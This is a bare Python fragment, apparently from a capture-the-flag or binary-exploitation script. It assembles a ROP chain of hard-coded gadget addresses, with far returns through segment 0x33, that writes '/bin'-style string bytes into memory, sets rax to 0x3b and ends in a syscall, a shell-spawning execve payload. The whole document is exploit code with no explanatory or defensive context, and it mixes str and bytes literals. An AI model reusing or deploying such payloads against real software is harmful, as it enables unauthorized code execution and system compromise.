payload = p64(0x435bb5)
#0x435bb5: pop rdx ; retf 2
payload += p64(0x46a070)+p32(0x42c6bb)+p32(0x33)+"\x00"*2
# 0x42c6bb: pop rax ; retf
payload += p64(0x6e69622f)+p32(0x4423e4)+p32(0x33)
# 0x00000000004423e4: add dword ptr [rdx], eax; add cl, ch; ret 0; 
payload += p64(0x435bb5)
# 0x435bb5: pop rdx ; retf 2
payload += p64(0x46a074)+p32(0x42c6bb)+p32(0x33)+"\x00"*2
# 0x42c6bb: pop rax ; retf
payload += p64(0x68662f)+p32(0x4423e4)+p32(0x33)
# 0x00000000004423e4: add dword ptr [rdx], eax; add cl, ch; ret 0; 
payload += p64(0x42c6bb)
# 0x42c6bb: pop rax ; retf
payload += p64(0x3b)+p32(0x435bb5)+p32(0x33)
# 0x435bb5: pop rdx ; retf 2
payload += p64(0x0)+p32(0x4017d3)+p32(0x33)+"\x00"*2
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x46a070)+p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x458f3a)
# 0x0000000000458f3a: syscall; 
payload += b''
